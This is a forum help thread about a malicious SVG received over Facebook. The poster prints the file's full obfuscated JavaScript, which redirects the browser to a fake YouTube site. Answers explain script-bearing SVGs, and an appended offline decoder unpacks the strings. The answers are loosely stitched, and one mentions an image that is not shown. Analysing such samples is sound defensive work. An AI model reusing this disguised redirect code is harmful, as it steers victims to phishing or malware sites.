I received a Facebook message with two files (SVG pictures), and I clicked one of them (I do not know why :( ). Then a new tab with a red dot opened, and then I was immediately redirected to some site pretending to look like YouTube (http://kerman.pw/?fb_dsa).
Then I downloaded the .svg file using the "Save link as..." function. It seems it is some JavaScript code embedded into the SVG, so I am posting it here (I do not know JS very well):
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" xmlns="http://www.w3.org/2000/svg">
<circle cx="250" cy="250" r="50" fill="red" />
<script type="text/javascript"><![CDATA[
function xcxxy(gyqbv,hzrgh,ktjrf){
  var qixua = "XY_/3cU.ioGJkP2hgveS1Tj75ABb=Nrs:u?fKmdI0nLty84CRpVOzaFD9lZExMH6";
  var vyqsvo = ["rYf=3vXU:zitl17N.k24ah8ZO6KoDFjPMEceRmsTGbdVBH59uJS\/I0g_CL?pxAyn","RN?dh38MCU0o6u=tIXPp.nZJzc5D:TiLFOvYfjG4E2K1A_rgaHykbS\/9lB7sexVm","n4mAObK9zBt_YZrcE1JHM.SF=dRT:6aDeUuIPi2vfhkGXp?y5LgVoCj0873lxN\/s","C981S?moMiHktu:nev0ZBzVh.2FONIcbxf7GYL6RgpUTAP4j_DJl\/dKa35rsX=Ey","9n?SGiTY6z8BjCbM:Lpsr0xZeUvPaH.JmfudtlE1\/y=kFODRKN24c5oX37_hAIVg",":z2oNO?Tr=aIx8.6gVeRn4_vYE5f1mZAXKltbuU7ByDSMis0Fk\/Pjch3CGLHJd9p"];
  var bnkdip = "";
  var igrqm = 0;
  while(vyqsvo[igrqm]){
    igrqm++;
  }
  var kwwtmh = 0;
  while(gyqbv[kwwtmh]){
    var jikaig = 0;
    var axfnq = -1;
    while(qixua[jikaig]){
      if(qixua[jikaig] == gyqbv[kwwtmh]){
        axfnq = jikaig;
        break;
      }
      jikaig++;
    }
    if(axfnq >= 0){
      var abxnk = 0;
      var wjtfca = -1;
      while(vyqsvo[kwwtmh%igrqm][abxnk]){
        if(vyqsvo[kwwtmh%igrqm][abxnk] == gyqbv[kwwtmh]){
          wjtfca = abxnk;
          break;
        }
        abxnk++;
      }
      bnkdip += qixua[wjtfca];
    }else{
      bnkdip += gyqbv[kwwtmh];
    }
    kwwtmh++;
  }
  var evhrt = "";
  for(izqfrv=hzrgh;izqfrv<bnkdip.length;izqfrv++){
    evhrt += bnkdip[izqfrv];
  }
  bnkdip = evhrt;
  return bnkdip;
}
var obejok = window;
var iyysri = xcxxy("sUTA:Gkb106SzH",11,false);
var leizjp = xcxxy("kBB?5S:Uh",1,false);
var nvanw = xcxxy(".Pi/MksB2n7jIta0d",13,false);
obejok[iyysri][leizjp][nvanw] = xcxxy("siqnkSJFA1l=Eiz6YOzjADMk=1afJSUHcD",3,false);
]]></script>
</svg>
I don't really know JavaScript, and I wanted to ask what it can do. Could it hurt me? Thank you very much.
Yes, you heard that right: JavaScript, and this is exactly how bad guys exploit this file format. By injecting malicious JavaScript code into the file, they can redirect the browser to a malicious website. The image below shows the inspection of the SVG file and the malicious JavaScript embedded in it.
JavaScript can be added anywhere in an SVG document between the opening and closing <svg> tags. In general, a script should be placed at the end of the document to avoid blocking and allow the script complete access to the DOM.
What is an SVG file? Scalable Vector Graphics (SVG) is a web-friendly vector file format. As opposed to pixel-based raster files like JPEGs, vector files store images via mathematical formulas based on points and lines on a grid.
You are correct that the SVG file has embedded JavaScript. SVGs are vector graphics files which will draw an image in the browser based on the instructions inside the file. The SVG you found contains obfuscated JavaScript to hide what is actually going on.
At a glance, from what I can see, it is a script to open a new browser window and load a new URL, so by itself it is not dangerous; it all depends on what website it is redirecting you to, and what scripts are set to kick off when you reach the website.
So in short, it CAN harm your computer given the assumption that the site you're being redirected to is malicious.
I hope that helps.
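To see what the script does without opening the SVG in a browser, its decoder can be reimplemented and run offline. The following is an added example, not part of the original post or answer: the names `decode`, `analyze` and `defang` are chosen here, while the alphabets and encoded strings are copied from the SVG above.

```javascript
// Static decoder for the strings in the posted SVG. Run with Node.js: it only
// decodes text and never touches window or the network.

// Alphabets copied verbatim from the sample.
const BASE = "XY_/3cU.ioGJkP2hgveS1Tj75ABb=Nrs:u?fKmdI0nLty84CRpVOzaFD9lZExMH6";
const ROWS = [
  "rYf=3vXU:zitl17N.k24ah8ZO6KoDFjPMEceRmsTGbdVBH59uJS\/I0g_CL?pxAyn",
  "RN?dh38MCU0o6u=tIXPp.nZJzc5D:TiLFOvYfjG4E2K1A_rgaHykbS\/9lB7sexVm",
  "n4mAObK9zBt_YZrcE1JHM.SF=dRT:6aDeUuIPi2vfhkGXp?y5LgVoCj0873lxN\/s",
  "C981S?moMiHktu:nev0ZBzVh.2FONIcbxf7GYL6RgpUTAP4j_DJl\/dKa35rsX=Ey",
  "9n?SGiTY6z8BjCbM:Lpsr0xZeUvPaH.JmfudtlE1\/y=kFODRKN24c5oX37_hAIVg",
  ":z2oNO?Tr=aIx8.6gVeRn4_vYE5f1mZAXKltbuU7ByDSMis0Fk\/Pjch3CGLHJd9p",
];

// Same substitution as xcxxy(): the character at position k is looked up in
// ROWS[k % 6] and replaced by the BASE character at that index; the first
// `skip` characters of the result are padding and are dropped.
function decode(encoded, skip) {
  let out = "";
  for (let k = 0; k < encoded.length; k++) {
    const ch = encoded[k];
    if (!BASE.includes(ch)) { out += ch; continue; } // not in alphabet: copied through
    out += BASE[ROWS[k % ROWS.length].indexOf(ch)];
  }
  return out.slice(skip);
}

// The four xcxxy() calls made by the sample, in order.
const CALLS = [
  ["sUTA:Gkb106SzH", 11],
  ["kBB?5S:Uh", 1],
  [".Pi/MksB2n7jIta0d", 13],
  ["siqnkSJFA1l=Eiz6YOzjADMk=1afJSUHcD", 3],
];

// Rebuild the final assignment obejok[a][b][c] = value as readable text.
function analyze() {
  const [a, b, c, value] = CALLS.map(([s, n]) => decode(s, n));
  return { target: `window.${a}.${b}.${c}`, value };
}

// Defang a URL so it is not clickable when pasted into a ticket or report.
function defang(url) {
  return url.replace(/^http/, "hxxp").replace(/\./g, "[.]");
}

const result = analyze();
console.log(`${result.target} = ${defang(result.value)}`);
```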